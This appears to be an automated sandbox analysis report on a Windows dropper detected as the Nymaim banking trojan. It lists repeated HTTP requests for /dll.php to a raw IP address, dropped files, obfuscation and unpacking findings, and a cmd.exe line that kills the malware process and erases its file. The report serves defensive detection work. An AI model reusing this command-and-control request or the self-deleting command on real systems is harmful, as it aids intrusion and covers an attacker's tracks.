Source: global traffic HTTP traffic detected: GET /dll.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: BHost: 45.12.253.75Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /dll.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: BHost: 45.12.253.75Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /dll.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: BHost: 45.12.253.75Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /dll.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: BHost: 45.12.253.75Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /dll.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: BHost: 45.12.253.75Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /dll.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: BHost: 45.12.253.75Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /dll.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: BHost: 45.12.253.75Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /dll.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: BHost: 45.12.253.75Connection: Keep-AliveCache-Control: no-cache
Creates a DirectInput object (often for capturing keystrokes)
Source: 1ibwQtrqNy.exe, 00000000.00000002.447457062.00000000007BA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

E-Banking Fraud
barindex
Yara detected Nymaim
Source: Yara match File source: 2.2.Rec528.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.Rec528.exe.3260000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.Rec528.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.Rec528.exe.3260000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000002.00000002.443567321.0000000003260000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.442855707.0000000000400000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Uses 32bit PE files
Source: 1ibwQtrqNy.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
Detected potential crypto function
Source: C:\Users\user\Desktop\1ibwQtrqNy.exe Code function: 0_2_00408280 0_2_00408280
Source: C:\Users\user\AppData\Local\Temp\is-50VJD.tmp\is-2H2P0.tmp Code function: 1_2_00468C28 1_2_00468C28
Source: C:\Users\user\AppData\Local\Temp\is-50VJD.tmp\is-2H2P0.tmp Code function: 1_2_00461280 1_2_00461280
Source: C:\Users\user\AppData\Local\Temp\is-50VJD.tmp\is-2H2P0.tmp Code function: 1_2_0043DE40 1_2_0043DE40
Source: C:\Users\user\AppData\Local\Temp\is-50VJD.tmp\is-2H2P0.tmp Code function: 1_2_004302D0 1_2_004302D0
Source: C:\Users\user\AppData\Local\Temp\is-50VJD.tmp\is-2H2P0.tmp Code function: 1_2_004445B8 1_2_004445B8
Source: C:\Users\user\AppData\Local\Temp\is-50VJD.tmp\is-2H2P0.tmp Code function: 1_2_00434864 1_2_00434864
Source: C:\Users\user\AppData\Local\Temp\is-50VJD.tmp\is-2H2P0.tmp Code function: 1_2_0047AA90 1_2_0047AA90
Source: C:\Users\user\AppData\Local\Temp\is-50VJD.tmp\is-2H2P0.tmp Code function: 1_2_00444B60 1_2_00444B60
Source: C:\Users\user\AppData\Local\Temp\is-50VJD.tmp\is-2H2P0.tmp Code function: 1_2_0045ADE0 1_2_0045ADE0
Source: C:\Users\user\AppData\Local\Temp\is-50VJD.tmp\is-2H2P0.tmp Code function: 1_2_00480F94 1_2_00480F94
Source: C:\Users\user\AppData\Local\Temp\is-50VJD.tmp\is-2H2P0.tmp Code function: 1_2_00445258 1_2_00445258
Source: C:\Users\user\AppData\Local\Temp\is-50VJD.tmp\is-2H2P0.tmp Code function: 1_2_004132E1 1_2_004132E1
Source: C:\Users\user\AppData\Local\Temp\is-50VJD.tmp\is-2H2P0.tmp Code function: 1_2_00463288 1_2_00463288
Source: C:\Users\user\AppData\Local\Temp\is-50VJD.tmp\is-2H2P0.tmp Code function: 1_2_00435568 1_2_00435568
Source: C:\Users\user\AppData\Local\Temp\is-50VJD.tmp\is-2H2P0.tmp Code function: 1_2_00445664 1_2_00445664
Source: C:\Users\user\AppData\Local\Temp\is-50VJD.tmp\is-2H2P0.tmp Code function: 1_2_0042F874 1_2_0042F874
Source: C:\Users\user\AppData\Local\Temp\is-50VJD.tmp\is-2H2P0.tmp Code function: 1_2_00457F04 1_2_00457F04
Source: C:\Program Files (x86)\FLSCover\Rec528\Rec528.exe Code function: 2_2_00404490 2_2_00404490
Source: C:\Program Files (x86)\FLSCover\Rec528\Rec528.exe Code function: 2_2_00409670 2_2_00409670
Source: C:\Program Files (x86)\FLSCover\Rec528\Rec528.exe Code function: 2_2_004056A0 2_2_004056A0
Source: C:\Program Files (x86)\FLSCover\Rec528\Rec528.exe Code function: 2_2_00406800 2_2_00406800
Source: C:\Program Files (x86)\FLSCover\Rec528\Rec528.exe Code function: 2_2_00406AA0 2_2_00406AA0
Source: C:\Program Files (x86)\FLSCover\Rec528\Rec528.exe Code function: 2_2_00404D40 2_2_00404D40
Source: C:\Program Files (x86)\FLSCover\Rec528\Rec528.exe Code function: 2_2_00405F40 2_2_00405F40
Source: C:\Program Files (x86)\FLSCover\Rec528\Rec528.exe Code function: 2_2_00402F20 2_2_00402F20
Source: C:\Program Files (x86)\FLSCover\Rec528\Rec528.exe Code function: 2_2_00415053 2_2_00415053
Source: C:\Program Files (x86)\FLSCover\Rec528\Rec528.exe Code function: 2_2_00415285 2_2_00415285
Source: C:\Program Files (x86)\FLSCover\Rec528\Rec528.exe Code function: 2_2_00422329 2_2_00422329
Source: C:\Program Files (x86)\FLSCover\Rec528\Rec528.exe Code function: 2_2_00419490 2_2_00419490
Source: C:\Program Files (x86)\FLSCover\Rec528\Rec528.exe Code function: 2_2_004267D0 2_2_004267D0
Source: C:\Program Files (x86)\FLSCover\Rec528\Rec528.exe Code function: 2_2_00404840 2_2_00404840
Source: C:\Program Files (x86)\FLSCover\Rec528\Rec528.exe Code function: 2_2_004109D0 2_2_004109D0
Source: C:\Program Files (x86)\FLSCover\Rec528\Rec528.exe Code function: 2_2_0042AB1A 2_2_0042AB1A
Source: C:\Program Files (x86)\FLSCover\Rec528\Rec528.exe Code function: 2_2_0040CBC0 2_2_0040CBC0
Source: C:\Program Files (x86)\FLSCover\Rec528\Rec528.exe Code function: 2_2_00421C08 2_2_00421C08
Source: C:\Program Files (x86)\FLSCover\Rec528\Rec528.exe Code function: 2_2_0042AC3A 2_2_0042AC3A
Source: C:\Program Files (x86)\FLSCover\Rec528\Rec528.exe Code function: 2_2_00428CB9 2_2_00428CB9
Source: C:\Program Files (x86)\FLSCover\Rec528\Rec528.exe Code function: 2_2_00447D2D 2_2_00447D2D
Source: C:\Program Files (x86)\FLSCover\Rec528\Rec528.exe Code function: 2_2_00404F20 2_2_00404F20
Source: C:\Program Files (x86)\FLSCover\Rec528\Rec528.exe Code function: 2_2_1000E111 2_2_1000E111
Source: C:\Program Files (x86)\FLSCover\Rec528\Rec528.exe Code function: 2_2_1000FAC0 2_2_1000FAC0
Found potential string decryption / allocating functions
Source: C:\Program Files (x86)\FLSCover\Rec528\Rec528.exe Code function: String function: 10003100 appears 33 times
Source: C:\Program Files (x86)\FLSCover\Rec528\Rec528.exe Code function: String function: 0040F960 appears 54 times
Source: C:\Users\user\AppData\Local\Temp\is-50VJD.tmp\is-2H2P0.tmp Code function: String function: 004035DC appears 90 times
Source: C:\Users\user\AppData\Local\Temp\is-50VJD.tmp\is-2H2P0.tmp Code function: String function: 00408CA0 appears 42 times
Source: C:\Users\user\AppData\Local\Temp\is-50VJD.tmp\is-2H2P0.tmp Code function: String function: 00403548 appears 62 times
Source: C:\Users\user\AppData\Local\Temp\is-50VJD.tmp\is-2H2P0.tmp Code function: String function: 00446194 appears 58 times
Source: C:\Users\user\AppData\Local\Temp\is-50VJD.tmp\is-2H2P0.tmp Code function: String function: 00445EC4 appears 43 times
Source: C:\Users\user\AppData\Local\Temp\is-50VJD.tmp\is-2H2P0.tmp Code function: String function: 004037CC appears 193 times
Source: C:\Users\user\AppData\Local\Temp\is-50VJD.tmp\is-2H2P0.tmp Code function: String function: 0043477C appears 32 times
Source: C:\Users\user\AppData\Local\Temp\is-50VJD.tmp\is-2H2P0.tmp Code function: String function: 00455D54 appears 48 times
Source: C:\Users\user\AppData\Local\Temp\is-50VJD.tmp\is-2H2P0.tmp Code function: String function: 00407988 appears 33 times
Source: C:\Users\user\AppData\Local\Temp\is-50VJD.tmp\is-2H2P0.tmp Code function: String function: 00455B64 appears 86 times
Source: C:\Users\user\AppData\Local\Temp\is-50VJD.tmp\is-2H2P0.tmp Code function: String function: 00451DE8 appears 62 times
Source: C:\Users\user\AppData\Local\Temp\is-50VJD.tmp\is-2H2P0.tmp Code function: String function: 00405A9C appears 92 times
Contains functionality to call native functions
Source: C:\Users\user\AppData\Local\Temp\is-50VJD.tmp\is-2H2P0.tmp Code function: 1_2_00423C4C NtdllDefWindowProc_A, 1_2_00423C4C
Source: C:\Users\user\AppData\Local\Temp\is-50VJD.tmp\is-2H2P0.tmp Code function: 1_2_004126A0 NtdllDefWindowProc_A, 1_2_004126A0
Source: C:\Users\user\AppData\Local\Temp\is-50VJD.tmp\is-2H2P0.tmp Code function: 1_2_00455514 PostMessageA,PostMessageA,SetForegroundWindow,NtdllDefWindowProc_A, 1_2_00455514
PE file contains executable resources (Code or Archives)
Source: is-2H2P0.tmp.0.dr Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
Source: is-2H2P0.tmp.0.dr Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) Intel Itanium, for MS Windows
Source: is-2H2P0.tmp.0.dr Static PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Source: is-U3J98.tmp.1.dr Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
Source: is-U3J98.tmp.1.dr Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) Intel Itanium, for MS Windows
Source: is-U3J98.tmp.1.dr Static PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Sample file is different than original file name gathered from version info
Source: 1ibwQtrqNy.exe, 00000000.00000003.351264625.00000000021B0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameshfolder.dll~/ vs 1ibwQtrqNy.exe
Source: 1ibwQtrqNy.exe, 00000000.00000003.351264625.00000000021B0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilename6 vs 1ibwQtrqNy.exe
Source: 1ibwQtrqNy.exe, 00000000.00000003.351368763.0000000001FD8000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameshfolder.dll~/ vs 1ibwQtrqNy.exe
Source: 1ibwQtrqNy.exe, 00000000.00000003.351368763.0000000001FD8000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilename6 vs 1ibwQtrqNy.exe
Source: 1ibwQtrqNy.exe, 00000000.00000002.447399623.0000000000410000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilename" vs 1ibwQtrqNy.exe
Source: 1ibwQtrqNy.exe Binary or memory string: OriginalFilename" vs 1ibwQtrqNy.exe
Dropped file seen in connection with other malware
Source: Joe Sandbox View Dropped File: C:\Program Files (x86)\FLSCover\Rec528\Preview.exe (copy) 233D846FEB73A38141BDF6C813C7476FA3F66DCD3548338607F3B7CB61CAC730
Source: Rec528.exe.1.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_PURGEABLE, IMAGE_SCN_MEM_16BIT, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: 1ibwQtrqNy.exe Virustotal: Detection: 19%
Source: C:\Users\user\Desktop\1ibwQtrqNy.exe File read: C:\Users\user\Desktop\1ibwQtrqNy.exe Jump to behavior
Source: C:\Users\user\Desktop\1ibwQtrqNy.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\1ibwQtrqNy.exe C:\Users\user\Desktop\1ibwQtrqNy.exe
Source: C:\Users\user\Desktop\1ibwQtrqNy.exe Process created: C:\Users\user\AppData\Local\Temp\is-50VJD.tmp\is-2H2P0.tmp "C:\Users\user\AppData\Local\Temp\is-50VJD.tmp\is-2H2P0.tmp" /SL4 $2048E "C:\Users\user\Desktop\1ibwQtrqNy.exe" 1911253 52224
Source: C:\Users\user\AppData\Local\Temp\is-50VJD.tmp\is-2H2P0.tmp Process created: C:\Program Files (x86)\FLSCover\Rec528\Rec528.exe "C:\Program Files (x86)\FLSCover\Rec528\Rec528.exe"
Source: C:\Program Files (x86)\FLSCover\Rec528\Rec528.exe Process created: C:\Users\user\AppData\Roaming\{e6e9dfa8-98f2-11e9-90ce-806e6f6e6963}\IFLIjCfKSqd.exe
Source: C:\Program Files (x86)\FLSCover\Rec528\Rec528.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c taskkill /im "Rec528.exe" /f & erase "C:\Program Files (x86)\FLSCover\Rec528\Rec528.exe" & exit
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /im "Rec528.exe" /f
Source: C:\Users\user\Desktop\1ibwQtrqNy.exe Process created: C:\Users\user\AppData\Local\Temp\is-50VJD.tmp\is-2H2P0.tmp "C:\Users\user\AppData\Local\Temp\is-50VJD.tmp\is-2H2P0.tmp" /SL4 $2048E "C:\Users\user\Desktop\1ibwQtrqNy.exe" 1911253 52224 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-50VJD.tmp\is-2H2P0.tmp Process created: C:\Program Files (x86)\FLSCover\Rec528\Rec528.exe "C:\Program Files (x86)\FLSCover\Rec528\Rec528.exe" Jump to behavior
Source: C:\Program Files (x86)\FLSCover\Rec528\Rec528.exe Process created: C:\Users\user\AppData\Roaming\{e6e9dfa8-98f2-11e9-90ce-806e6f6e6963}\IFLIjCfKSqd.exe Jump to behavior
Source: C:\Program Files (x86)\FLSCover\Rec528\Rec528.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c taskkill /im "Rec528.exe" /f & erase "C:\Program Files (x86)\FLSCover\Rec528\Rec528.exe" & exit Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /im "Rec528.exe" /f Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-50VJD.tmp\is-2H2P0.tmp Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32 Jump to behavior
Source: C:\Users\user\Desktop\1ibwQtrqNy.exe Code function: 0_2_0040910C GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,6CBC4E70, 0_2_0040910C
Source: C:\Users\user\AppData\Local\Temp\is-50VJD.tmp\is-2H2P0.tmp Code function: 1_2_00453D80 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,6CBC4E70, 1_2_00453D80
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = &quot;Rec528.exe&quot;)
Source: C:\Program Files (x86)\FLSCover\Rec528\Rec528.exe File created: C:\Users\user\AppData\Roaming\{e6e9dfa8-98f2-11e9-90ce-806e6f6e6963} Jump to behavior
Source: C:\Users\user\Desktop\1ibwQtrqNy.exe File created: C:\Users\user\AppData\Local\Temp\is-50VJD.tmp Jump to behavior
Source: classification engine Classification label: mal100.troj.evad.winEXE@12/23@0/4
Source: C:\Program Files (x86)\FLSCover\Rec528\Rec528.exe Code function: 2_2_00401B40 HttpAddRequestHeadersA,InternetSetFilePointer,InternetReadFile,HttpQueryInfoA,LdrInitializeThunk,CoCreateInstance,MultiByteToWideChar,LdrInitializeThunk,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar, 2_2_00401B40
Source: C:\Users\user\AppData\Local\Temp\is-50VJD.tmp\is-2H2P0.tmp File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-50VJD.tmp\is-2H2P0.tmp Code function: 1_2_004547A0 GetModuleHandleA,6C8D5550,GetDiskFreeSpaceA, 1_2_004547A0
Source: C:\Program Files (x86)\FLSCover\Rec528\Rec528.exe Code function: 2_2_00402C00 VirtualProtect,GetLastError,FormatMessageA,LocalAlloc,OutputDebugStringA,LocalFree,LocalFree,LocalFree, 2_2_00402C00
Source: C:\Program Files (x86)\FLSCover\Rec528\Rec528.exe Code function: 2_2_00405350 CreateToolhelp32Snapshot,Process32First,Process32Next,Process32Next,FindCloseChangeNotification, 2_2_00405350
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5972:120:WilError_01
Source: C:\Users\user\AppData\Local\Temp\is-50VJD.tmp\is-2H2P0.tmp Code function: 1_2_0040B090 FindResourceA,FreeResource, 1_2_0040B090
Source: C:\Users\user\AppData\Local\Temp\is-50VJD.tmp\is-2H2P0.tmp File created: C:\Program Files (x86)\FLSCover Jump to behavior
Source: C:\Program Files (x86)\FLSCover\Rec528\Rec528.exe Command line argument: `a}{ 2_2_00409670
Source: C:\Program Files (x86)\FLSCover\Rec528\Rec528.exe Command line argument: MFE. 2_2_00409670
Source: C:\Program Files (x86)\FLSCover\Rec528\Rec528.exe Command line argument: ZK]Z 2_2_00409670
Source: C:\Program Files (x86)\FLSCover\Rec528\Rec528.exe Command line argument: ZK]Z 2_2_00409670
Source: C:\Users\user\AppData\Local\Temp\is-50VJD.tmp\is-2H2P0.tmp Window found: window name: TMainForm Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: 1ibwQtrqNy.exe Static file information: File size 2146015 > 1048576

Data Obfuscation
barindex
Detected unpacking (overwrites its own PE header)
Source: C:\Program Files (x86)\FLSCover\Rec528\Rec528.exe Unpacked PE file: 2.2.Rec528.exe.400000.1.unpack
Detected unpacking (changes PE section rights)
Source: C:\Program Files (x86)\FLSCover\Rec528\Rec528.exe Unpacked PE file: 2.2.Rec528.exe.400000.1.unpack .text:ER;.rdata:R;.data:W;.tls:W;.rsrc:R;.fls528:EW; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\1ibwQtrqNy.exe Code function: 0_2_00406594 push 004065D1h; ret 0_2_004065C9
Source: C:\Users\user\Desktop\1ibwQtrqNy.exe Code function: 0_2_00404159 push eax; ret 0_2_00404195
Source: C:\Users\user\Desktop\1ibwQtrqNy.exe Code function: 0_2_00404229 push 00404435h; ret 0_2_0040442D
Source: C:\Users\user\Desktop\1ibwQtrqNy.exe Code function: 0_2_004042AA push 00404435h; ret 0_2_0040442D
Source: C:\Users\user\Desktop\1ibwQtrqNy.exe Code function: 0_2_00404327 push 00404435h; ret 0_2_0040442D
Source: C:\Users\user\Desktop\1ibwQtrqNy.exe Code function: 0_2_00408BDC push 00408C0Fh; ret 0_2_00408C07
Source: C:\Users\user\Desktop\1ibwQtrqNy.exe Code function: 0_2_0040438C push 00404435h; ret 0_2_0040442D
Source: C:\Users\user\Desktop\1ibwQtrqNy.exe Code function: 0_2_00407F3C push ecx; mov dword ptr [esp], eax 0_2_00407F41
Source: C:\Users\user\AppData\Local\Temp\is-50VJD.tmp\is-2H2P0.tmp Code function: 1_2_00409A20 push 00409A5Dh; ret 1_2_00409A55
Source: C:\Users\user\AppData\Local\Temp\is-50VJD.tmp\is-2H2P0.tmp Code function: 1_2_0040A107 push ds; ret 1_2_0040A108
Source: C:\Users\user\AppData\Local\Temp\is-50VJD.tmp\is-2H2P0.tmp Code function: 1_2_004302D0 push ecx; mov dword ptr [esp], eax 1_2_004302D5
Source: C:\Users\user\AppData\Local\Temp\is-50VJD.tmp\is-2H2P0.tmp Code function: 1_2_004063C0 push ecx; mov dword ptr [esp], eax 1_2_004063C1
Source: C:\Users\user\AppData\Local\Temp\is-50VJD.tmp\is-2H2P0.tmp Code function: 1_2_004785C8 push 00478673h; ret 1_2_0047866B
Source: C:\Users\user\AppData\Local\Temp\is-50VJD.tmp\is-2H2P0.tmp Code function: 1_2_00410798 push ecx; mov dword ptr [esp], edx 1_2_0041079D
Source: C:\Users\user\AppData\Local\Temp\is-50VJD.tmp\is-2H2P0.tmp Code function: 1_2_004129F0 push 00412A53h; ret 1_2_00412A4B
Source: C:\Users\user\AppData\Local\Temp\is-50VJD.tmp\is-2H2P0.tmp Code function: 1_2_0045AA9C push ecx; mov dword ptr [esp], eax 1_2_0045AAA1
Source: C:\Users\user\AppData\Local\Temp\is-50VJD.tmp\is-2H2P0.tmp Code function: 1_2_00450EB4 push 00450EE7h; ret 1_2_00450EDF
Source: C:\Users\user\AppData\Local\Temp\is-50VJD.tmp\is-2H2P0.tmp Code function: 1_2_0040D0F0 push ecx; mov dword ptr [esp], edx 1_2_0040D0F2
Source: C:\Users\user\AppData\Local\Temp\is-50VJD.tmp\is-2H2P0.tmp Code function: 1_2_00443530 push ecx; mov dword ptr [esp], ecx 1_2_00443534
Source: C:\Users\user\AppData\Local\Temp\is-50VJD.tmp\is-2H2P0.tmp Code function: 1_2_004055BD push eax; ret 1_2_004055F9
Source: C:\Users\user\AppData\Local\Temp\is-50VJD.tmp\is-2H2P0.tmp Code function: 1_2_0040F650 push ecx; mov dword ptr [esp], edx 1_2_0040F652
Source: C:\Users\user\AppData\Local\Temp\is-50VJD.tmp\is-2H2P0.tmp Code function: 1_2_0040568D push 00405899h; ret 1_2_00405891
Source: C:\Users\user\AppData\Local\Temp\is-50VJD.tmp\is-2H2P0.tmp Code function: 1_2_0040570E push 00405899h; ret 1_2_00405891
Source: C:\Users\user\AppData\Local\Temp\is-50VJD.tmp\is-2H2P0.tmp Code function: 1_2_004057F0 push 00405899h; ret 1_2_00405891
Source: C:\Users\user\AppData\Local\Temp\is-50VJD.tmp\is-2H2P0.tmp Code function: 1_2_0040578B push 00405899h; ret 1_2_00405891
Source: C:\Users\user\AppData\Local\Temp\is-50VJD.tmp\is-2H2P0.tmp Code function: 1_2_00479B20 push ecx; mov dword ptr [esp], ecx 1_2_00479B25
Source: C:\Users\user\AppData\Local\Temp\is-50VJD.tmp\is-2H2P0.tmp Code function: 1_2_00419CF0 push ecx; mov dword ptr [esp], ecx 1_2_00419CF5
Source: C:\Program Files (x86)\FLSCover\Rec528\Rec528.exe Code function: 2_2_004311AD push esi; ret 2_2_004311B6
Source: C:\Program Files (x86)\FLSCover\Rec528\Rec528.exe Code function: 2_2_0040F43A push ecx; ret 2_2_0040F44D
Source: C:\Program Files (x86)\FLSCover\Rec528\Rec528.exe Code function: 2_2_1000E823 push ecx; ret 2_2_1000E836
PE file contains sections with non-standard names
Source: Rec528.exe.1.dr Static PE information: section name: .fls528
Source: initial sample Static PE information: section name: .text entropy: 7.436915831767785
Drops PE files
Source: C:\Users\user\AppData\Local\Temp\is-50VJD.tmp\is-2H2P0.tmp File created: C:\Program Files (x86)\FLSCover\Rec528\Rec528.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-50VJD.tmp\is-2H2P0.tmp File created: C:\Users\user\AppData\Local\Temp\is-5SERN.tmp\_iscrypt.dll Jump to dropped file
Source: C:\Users\user\Desktop\1ibwQtrqNy.exe File created: C:\Users\user\AppData\Local\Temp\is-50VJD.tmp\is-2H2P0.tmp Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-50VJD.tmp\is-2H2P0.tmp File created: C:\Program Files (x86)\FLSCover\Rec528\is-Q8OGG.tmp Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-50VJD.tmp\is-2H2P0.tmp File created: C:\Program Files (x86)\FLSCover\Rec528\is-U3J98.tmp Jump to dropped file
Source: C:\Program Files (x86)\FLSCover\Rec528\Rec528.exe File created: C:\Users\user\AppData\Roaming\{e6e9dfa8-98f2-11e9-90ce-806e6f6e6963}\IFLIjCfKSqd.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-50VJD.tmp\is-2H2P0.tmp File created: C:\Users\user\AppData\Local\Temp\is-5SERN.tmp\_isetup\_shfoldr.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-50VJD.tmp\is-2H2P0.tmp File created: C:\Users\user\AppData\Local\Temp\is-5SERN.tmp\_isetup\_setup64.tmp Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-50VJD.tmp\is-2H2P0.tmp File created: C:\Program Files (x86)\FLSCover\Rec528\Preview.exe (copy) Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-50VJD.tmp\is-2H2P0.tmp File created: C:\Program Files (x86)\FLSCover\Rec528\unins000.exe (copy) Jump to dropped file
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Source: C:\Users\user\AppData\Local\Temp\is-50VJD.tmp\is-2H2P0.tmp Code function: 1_2_00423CD4 IsIconic,PostMessageA,PostMessageA,PostMessageA,SendMessageA,IsWindowEnabled,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus, 1_2_00423CD4
Source: C:\Users\user\AppData\Local\Temp\is-50VJD.tmp\is-2H2P0.tmp Code function: 1_2_00423CD4 IsIconic,PostMessageA,PostMessageA,PostMessageA,SendMessageA,IsWindowEnabled,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus, 1_2_00423CD4
Source: C:\Users\user\AppData\Local\Temp\is-50VJD.tmp\is-2H2P0.tmp Code function: 1_2_00478118 IsIconic,GetWindowLongA,ShowWindow,ShowWindow, 1_2_00478118
Source: C:\Users\user\AppData\Local\Temp\is-50VJD.tmp\is-2H2P0.tmp Code function: 1_2_0042425C IsIconic,SetActiveWindow, 1_2_0042425C
Source: C:\Users\user\AppData\Local\Temp\is-50VJD.tmp\is-2H2P0.tmp Code function: 1_2_004242A4 IsIconic,SetActiveWindow,SetFocus, 1_2_004242A4
Source: C:\Users\user\AppData\Local\Temp\is-50VJD.tmp\is-2H2P0.tmp Code function: 1_2_0041844C IsIconic,GetWindowPlacement,GetWindowRect,GetWindowLongA,GetWindowLongA,ScreenToClient,ScreenToClient, 1_2_0041844C
